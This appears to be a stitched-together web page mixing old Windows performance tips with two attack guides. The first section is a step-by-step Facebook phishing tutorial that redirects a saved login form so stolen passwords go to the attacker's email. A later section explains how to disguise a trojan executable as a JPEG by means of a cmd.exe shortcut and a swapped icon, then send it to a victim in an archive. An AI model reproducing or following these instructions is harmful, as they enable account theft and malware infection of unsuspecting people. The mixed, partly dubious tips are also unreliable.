How to hack facebook account and
what are its preventive measures
Step 1: Go to www.facebook.com
Step 2: Save the login page of facebook (shortcut:press ctrl+S)
Step 3: Now 2 things would have been saved in your computer with the name "Welcome to Facebook - Log In, Sign Up or Learn More"
Step 4: Right click on the saved file with name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" and open it with notepad
Step 5: Now search where the word action is written in it for the first time (shortcut:press ctrl+F then type action in it and then press enter).
Step 6: Now after action you will see action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"
Step 7: Now replace that line with action="http://email@example.com&link=www.facebook.com/login.php?login_attempt=1"
Step 8: Now replace the line firstname.lastname@example.org with your email-id where you want to recieve the password.
Step 9: Save the notepad(shortcut: ctrl+s).
Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others. bingoooooooo..:).
Note: Remember both the files will be moved together which you saved with the name "Welcome to Facebook - Log In, Sign Up or Learn More" and you can rename the file with the name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" but not that folder.
This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url www.facebook.com.hackfact.com then also its fake not genuine.).
1.Let your PC boot up completely before opening any applications.
2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).
4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM
5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6.Delete the temporary internet files regularly.
7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum. RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!
- Simple (and free) ways how to speed up your computer:
Tip: Disable the XP loading screen
To speed up booting your computer process slightly, disable the Windows XP loading screen. This can be done very easy:
- Open the MSCONFIG utility (Open Start\Run and type msconfig)
- Select the boot.ini tab
- Check the /NOGUIBOOT option. When you boot (start) your PC, you will see a black screen in between POST and the welcome screen from now on.
Tip: Check your hard drives with scandisk
With time, tons of small data problems and physical problems can develop and slow down the performance of your hard drive. While defragmenting the drive can help restore much of the performance you might have lost, there are other issues such as lost clusters which the defragmentation utility cannot fix.
Because of this, it is a good idea to run XP's error checking utility once in a while. This utility scans your disks for errors and optionally attempt to correct them.
- Open My computer
- Right click the hard disk you wanna scan and select Properties from the menu
- Choose the Tools tab and under Error checking click the Check now… button.
- Check both options. You will need to restart the computer to do the full disk check.
Your disk will be fully checked for errors upon reboot, but this can take quite a while.
Hi friends, i have a sloution for ur issue.
You can make ur normal pen drive to virus protected pendrive. for that u want 1 pc which having windows vista 0r 7 os installed. Follow the below steps……..
1) Connect ur pen drive to pc which having widows vista or windows 7 operating system. (The user must having Administrator rights)
2) Open ‘My Computer’ & right click on pendrive icon then select ‘Format’ option. Before formatting you must take a back up of all of your data because it deletes whole data from ur pen drive.
3) In Format window select file system tab & change it to ‘NTFS’ then click on ‘Start’ to start formatting.
4) After formatting done close the format window & open ur pendrive.
5) create one folder in pen drive & rename it to ‘secured’.
6) Back to ‘My Computer’ & again right click on pendrive & now select ‘Properties’ tab.
7) In properties window select security tab then click on edit & tick on ‘Deny’ for ‘Write’ permission then press ok to apply the settings.
8) Open pen drive again, right click on ‘Secured’ folder select ‘Properties’ then ‘Security’ tab.
again click on ‘Edit’ tab & set ‘Allow’ permission to ‘Full Control’ then click ok to apply settings.
9) Open ‘Secured’ folder, create one folder into that & rename it to ‘Secured.exe’.
10) Right click on ‘Secured.exe’ folder select ‘Properties’ & make it hidden by selecting ‘Hidden’ attribute then select ‘security’ tab click on ‘Edit’ & set ‘Deny’ permission to ‘Full Control’ .
10) Press ‘Ok’ to apply the settings.
Now ur pen drive is virus protected. but u can’t copy files into that directly. u need to copy all of ur files to the secured folder & I recommand that copy ur software setup files to the zip folder so, virus can’t access software’s exe files.
1. Firstly, create a new folder and make sure that the options ‘show hidden files’ is checked and ‘hide extensions for
known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on
2. Paste a copy of your server on the new created folder. let’s say it’s called server.exe
(that’s why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u
have to write this: C:WINDOWSsystem32cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:WINDOWSsystem32cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a
new window will pop up and u have to write this: %SystemRoot%system32SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.
15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning
you, the hidden file will always show up inside of a zip file or rar.
16. So the best way to send these files together to someone is compress them into zip or rar.
17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to
Disable the Aero Theme on Windows 7
Right Click on your Desktop and select ” Personalize ” click the Window Color Tab.
Uncheck the Box saying ” Enable Transparency ” and then click on ” Open classic appearance properties for more color options”.
Then a window will open up. Apply a Standard or Basic theme from it. The Standard Windows 7 theme is more preferred.
The aero user interface certainly adds some ” Eyecandy ” to Windows 7 but certainly is a resource hog especially when, what you expect from windows 7 is more performance juice. Aero user interface squeezes your graphics or video card to its maximum. So why dont we just avoid the Windows 7 aero? if we care more about speed and performance in Windows 7. So Disabling the Aero in Windows 7 certainly adds an extra speed boost to it.
disabling aero Speed Up Windows 7 Ultimate Guide To Make Windows 7 Blazing Fast!!!
Disabling the aero theme alone in Windows 7 will really speed things up. You can know this by looking into the memory consumption when aero is turned on and off.
The People Network is a website for Peoples to hangout online. On the site, you can access several games, music, videos, quizzes, and more!
Do you have a Facebook account? If so, you can sign in using your account! Just click the button below.